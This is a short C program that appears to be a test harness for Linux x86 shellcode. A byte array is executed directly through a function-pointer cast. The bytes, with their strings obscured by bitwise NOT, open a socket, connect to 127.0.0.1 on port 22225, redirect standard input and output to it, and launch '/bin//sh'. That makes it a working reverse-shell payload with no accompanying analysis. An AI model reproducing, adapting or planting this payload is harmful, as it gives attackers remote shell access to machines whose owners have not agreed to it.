#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>

char SC[]="\x31\xDB\xF7\xE3\x53\x43\x53\x6A\x02\x89\xE1\xB0\x66\xCD\x80\x5B\x5E\x68\x7F\x00\x00\x01\x66\x68\x56\xD1\x66\x53\x6A\x10\x51\x50\x89\xE1\x43\x6A\x66\x58\xCD\x80\x59\x87\xD9\xB0\x3F\xCD\x80\x49\x79\xF9\x50\x68\xD0\xD0\x8C\x97\x58\xF7\xD0\x50\x68\xD0\x9D\x96\x91\x58\xF7\xD0\x50\x31\xC0\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80";

int main( void )
{
    (*(void(*)()) SC)();
    return 0;

}

